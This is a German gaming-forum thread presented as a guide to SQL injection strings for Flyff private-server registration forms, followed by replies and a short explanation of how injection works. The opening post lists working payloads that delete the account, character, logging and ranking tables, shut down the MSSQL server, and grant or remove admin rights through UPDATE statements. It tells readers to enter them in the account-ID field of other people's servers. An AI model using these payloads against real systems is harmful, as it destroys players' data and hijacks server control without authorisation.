MMORPG Core - Deutsche Community für Online Rollenspiele - Powered by vBulletin

  • AAA
  • Aggressive
  • Alienated
  • Amazed
  • Amused
  • Angelic
  • Angry
  • Apelike
  • Artistic
  • Asleep
  • Balanced
  • Banhappy
  • Bashful
  • Bitchy
  • Blah
  • Bookworm
  • Bored
  • Breezy
  • Brooding
  • Busy
  • Buzzed
  • Chatty
  • Cheeky
  • Cheerful
  • Cloud 9
  • Cold
  • Coldturkey
  • Confused
  • Cool
  • Crappy
  • Creative
  • Curious
  • Cynical
  • Daring
  • Dead
  • Depressed
  • Devilish
  • Disagree
  • Doh
  • Doubtful
  • Dramaqueen
  • Dreaming
  • Drunk
  • Elated
  • Energetic
  • Fiendish
  • Fine
  • Flirty
  • Gloomy
  • Goofy
  • Grumpy
  • Happy
  • Horny
  • Hot
  • Hungover
  • In Love
  • Innocent
  • Inpain
  • Insomnious
  • Inspired
  • Lonely
  • Lucky
  • Lurking
  • Mellow
  • Mischievious
  • Mondayblues
  • Musical
  • Nerdy
  • Notamused
  • Notworthy
  • Paranoid
  • Pensive
  • Predatory
  • Procrastinating
  • Psychedelic
  • Question
  • Relaxed
  • Roflmao
  • Sad
  • Scared
  • Scurvy
  • Shocked
  • Sick
  • Sleepy
  • Sluggish
  • Sneaky
  • Snobbish
  • Spaced
  • Spooky
  • Sporty
  • Starving
  • Stressed
  • Sunshine
  • Sweettooth
  • Thinking
  • Tired
  • Torn
  • Twisted
  • Veggedout
  • Volatile
  • Woot
  • Worried
  • Yeehaw
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • Tweet   
    Seite 1 von 4 123 ... LetzteLetzte
    Ergebnis 1 bis 15 von 46
    1. #1
      Es wird!
       

      Registriert seit
      Jan 2010
      Beiträge
      61
      Danke
      38
      Danke erhalten: 25

      Working [Guide]Auflistung der SQL Befehle!

      Die Werbung stört? Registriere dich hier!
      Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!

      • Code:
        ';delete account_tbl;--
        Löscht die Accountdatenbank
      • Code:
        ';delete character_01_tbl;--
        Löscht die Characterdatenbank
      • Code:
        ';delete logging_01_tbl;--
        Löscht die Loggdatenbank
      • Code:
        ';delete ranking_tbl;--
        Löscht die Rankingdatenbank
      • Code:
        ';shutdown;--
        Schließt die MSSQL Verbindung!
      • Code:
         USE [CHARACTER_01_DBF]
         
        UPDATE CHARACTER_TBL SET m_chAuthority='Z'
         WHERE m_szName='ACCOUNTID' and serverindex='01'
         
        USE [ACCOUNT_DBF]
         
        UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
         WHERE account='CHARACTERNAME' and gamecode='A000'
        Gibt deinen Charackter Adminrechte!
        Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!


      Wie das funktioniert?

      Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!


      Ich werde diesen Thread updaten,sobald neue Codes bekannt sind!

      Viel Spaß

      wünscht Frucht
      Geändert von Frucht (03.01.10 um 19:23 Uhr) Grund: [Guide]Auflistung der SQL Befehle!
      Hat dir mein beitrag gefallen? Dann bitte ich vielmals um ein Thanks!

      XD

    2. Die folgenden 13 Mitglieder bedankten sich bei Frucht für diesen Beitrag:

      bestofmarcel (06.02.10), bobi17 (03.01.10), cletite (15.01.10), daora (04.01.10), escaPe (03.01.10), Etzel (03.01.10), Evil (03.01.10), Flyingsky (06.03.10), NightWalkerxD (04.01.10), Opf0r (04.01.10), Raiden (10.01.10), Robin9876 (05.01.10), trinity (10.01.10)

    3. #2
      Weiter so!
       
      Avatar von MeMyselfAndI
      Registriert seit
      Mar 2009
      Beiträge
      99
      Danke
      17
      Danke erhalten: 45

      Standard

      Nice.^^

      Auf Inposterum Workt es nicht. Auf Fame auch net. Offi garantiert net xD
      Auf welchen workt es denn? :D

      Hast ein THX ^-^

      LG & Guten Rutsch
      MeMyselfAndI
      I'm back! :D

    4. #3
      Core Freak!
      AAA
       

      Registriert seit
      May 2009
      Beiträge
      1,220
      Danke
      139
      Danke erhalten: 796

      Standard

      Auf denen die in ihren Inputs Sonderzeichen erlauben.

    5. Das folgende Mitglied bedankt sich bei felix für diesen Beitrag:

      Frucht (02.01.10)

    6. #4
      Es wird!
       

      Registriert seit
      Jan 2010
      Beiträge
      61
      Danke
      38
      Danke erhalten: 25

      Standard

      Hatte kleine Fehler in den Code´s.

      Jetzt sind die Code´s zu 100% richtig! (99,99%) xD
      Hat dir mein beitrag gefallen? Dann bitte ich vielmals um ein Thanks!

      XD

    7. #5
      Core Freak!
       
      Avatar von Foldercarp
      Registriert seit
      Sep 2009
      Ort
      Nobody is perfect.I´m nobody.
      Beiträge
      1,049
      Danke
      1,015
      Danke erhalten: 209

      Standard

      Wie soll das funzen?
      Weil, hat dann der PC Adminrechte oder wie meinst du das,''Deinen Charakter''
      Geändert von chrissi (13.01.10 um 15:04 Uhr) Grund: Full Quote entfernt

    8. #6
      Weiter so!
       

      Registriert seit
      Jul 2009
      Beiträge
      196
      Danke
      25
      Danke erhalten: 41

      Standard

      USE [CHARACTER_01_DBF]

      UPDATE CHARACTER_TBL SET m_chAuthority='Z'
      WHERE m_szName='ACCOUNTID' and serverindex='01'

      USE [ACCOUNT_DBF]

      UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
      WHERE account='CHARACTERNAME' and gamecode='A000'


      AccounID: Da gibst du deine ID ein , womit du dich ins Spiel einlogst.
      Charaktername: Der Name vom Charakter der die Rechte erhalten soll


      Dann hat dein Flyff Charakter die Adminrechte

    9. Die folgenden 2 Mitglieder bedankten sich bei Steamblade für diesen Beitrag:

      Foldercarp (03.01.10), Frucht (03.01.10)

    10. #7
      Es wird!
       

      Registriert seit
      Jan 2010
      Beiträge
      61
      Danke
      38
      Danke erhalten: 25

      Standard

      Zitat Zitat von Foldercarp [Um Links zu sehen registriere dich bitte. Klicke hier.]
      Wie soll das funzen?
      Weil, hat dann der PC Adminrechte oder wie meinst du das,''Deinen Charakter''
      Nein,man gibt das einfach in das Regristrierungsscript ein.

      Dann wird das ausgeführt.

      Und dein Charackter hat entweder Ingamer Rechte.

      Oder Datenbanken werden gelöscht.

      Oder die Verbindung zwischen Mssql bricht ab...
      Hat dir mein beitrag gefallen? Dann bitte ich vielmals um ein Thanks!

      XD

    11. #8
      Core Freak!
       
      Avatar von Foldercarp
      Registriert seit
      Sep 2009
      Ort
      Nobody is perfect.I´m nobody.
      Beiträge
      1,049
      Danke
      1,015
      Danke erhalten: 209

      Standard

      Dumme frager aber mit Early Guard würde das auch gehen oder? xD

    12. #9
      Es wird!
       

      Registriert seit
      Jan 2010
      Beiträge
      61
      Danke
      38
      Danke erhalten: 25

      Standard

      Zitat Zitat von Foldercarp [Um Links zu sehen registriere dich bitte. Klicke hier.]
      Dumme frager aber mit Early Guard würde das auch gehen oder? xD
      Ya würde es.

      Man kann es aber ganz leicht fixxen,indem man im Regiscript keine Sonderzeichen erlaubt.
      Hat dir mein beitrag gefallen? Dann bitte ich vielmals um ein Thanks!

      XD

    13. #10
      Core Freak!
      Asleep
       
      Avatar von TwiLight
      Registriert seit
      Mar 2009
      Beiträge
      2,674
      Danke
      714
      Danke erhalten: 1,928

      Standard

      Zitat Zitat von Foldercarp [Um Links zu sehen registriere dich bitte. Klicke hier.]
      Dumme frager aber mit Early Guard würde das auch gehen oder? xD
      ErlyGuard überwacht Packets auf bestimmten Ports aber nicht die Verbindung zwischen SQL und HTTP o.ô





      Danke an Nyun ♥


    14. Das folgende Mitglied bedankt sich bei TwiLight für diesen Beitrag:

      Foldercarp (03.01.10)

    15. #11
      Bruce ist sexy
      Sweettooth
       
      Avatar von Etzel
      Registriert seit
      Jan 2010
      Ort
      Niedersachsen
      Beiträge
      887
      Danke
      305
      Danke erhalten: 174

      Standard

      Vielen dank tolle Leistung

    16. #12
      Core Freak!
      AAA
       

      Registriert seit
      May 2009
      Beiträge
      1,220
      Danke
      139
      Danke erhalten: 796

      Standard

      Man man Man, da hier einige das Prinzip von SQL Injections nicht verstehen.
      Hier mal ein Beispiel eines auszuführenden SQL Statements:

      SELECT * FROM `accounts` WHERE `username` = '".$_POST['username']."'
      $_POST['username'] ist das was wir in das Textfeld eingegeben und abgeschickt haben.
      Schreiben wir also 'Felix' in das Textfeld so heißt unser SQL Statement

      SELECT * FROM `accounts` WHERE `username` = 'Felix'
      Aber da wir ganz böse Buben sind (und solche coolen "Hacker" wie akira Udo einer ist)
      schreiben wir natürlich nicht unseren Accountnamen
      rein sondern versuchen schön den Server putt zu machen. Also wie geht das? Ganz einfach
      der Coder im ersten Beispiel (das bin ich :D) hat natürlich keine Ahnung von der Materie
      und denkt sich "WTF?!! TAGS MASKIEREN? WASN DAT?" Also schreiben wir in
      unser Textfeld einfach "ich bin ein böser hacker' DELETE `accounts`--;"
      Nun heißt unser SQL Statement so:

      SELECT * FROM `accounts` WHERE `username` = 'ich bin ein böser hacker' DELETE `accounts`--;'
      Was passiert nun? Anstatt das das Script locker fluffig die Daten des ausgewählten
      accounts liest löscht es das account table. Und nein die beiden Minuszeichen (--) sind
      kein "voll str3ng geheimer h4cking c0de" sondern sind ein Kommentar in SQL und
      bewirken was alles was nach unserem DELETE Statement steht igoniert wird.
      Geändert von felix (03.01.10 um 01:27 Uhr)

    17. Die folgenden 4 Mitglieder bedankten sich bei felix für diesen Beitrag:

      Alina (03.01.10), Frucht (03.01.10), TwiLight (03.01.10), ^f4ke (05.01.10)

    18. #13
      Core
       

      Registriert seit
      Sep 2009
      Beiträge
      306
      Danke
      21
      Danke erhalten: 41

      Standard

      Lest euch das durch und schau euch die Struktur der Offi DB an, dann wisst ihr bescheid : [Um Links zu sehen registriere dich bitte. Klicke hier.]
      Hatte da auch mal eine Tutorial in Englisch, welches besser erklärt war, finde das aber gerade nicht.



    19. #14
      Weiter so!
       

      Registriert seit
      Dec 2009
      Beiträge
      245
      Danke
      56
      Danke erhalten: 446

      Standard

      Zitat Zitat von MeMyselfAndI [Um Links zu sehen registriere dich bitte. Klicke hier.]
      Nice.^^

      Auf Inposterum Workt es nicht. Auf Fame auch net. Offi garantiert net xD
      Auf welchen workt es denn? :D

      Hast ein THX ^-^

      LG & Guten Rutsch
      MeMyselfAndI
      Soweit ich weiß hat DD in frühen Zeiten tatsächlich offi FlyFF durch ne Injection drangekriegt... ;)
      (Kann mich aber auch irren... die Gerüchteküche ist nicht zu unterschätzen.)
      FlyFF Hack development sowie Portal 2 (auch im Coop) und vieles mehr auf meinem Kanal:
      www.Tom94.net

    20. #15
      Weiter so!
       
      Avatar von escaPe
      Registriert seit
      May 2009
      Ort
      Bielefeld
      Beiträge
      209
      Danke
      63
      Danke erhalten: 40

      Standard

      Nice. Hast nen thanks.
      Aber wieso funksen die nicht bei Fame?

    Seite 1 von 4 123 ... LetzteLetzte

    Lesezeichen

    Berechtigungen

    • Neue Themen erstellen: Nein
    • Themen beantworten: Nein
    • Anhänge hochladen: Nein
    • Beiträge bearbeiten: Nein
    •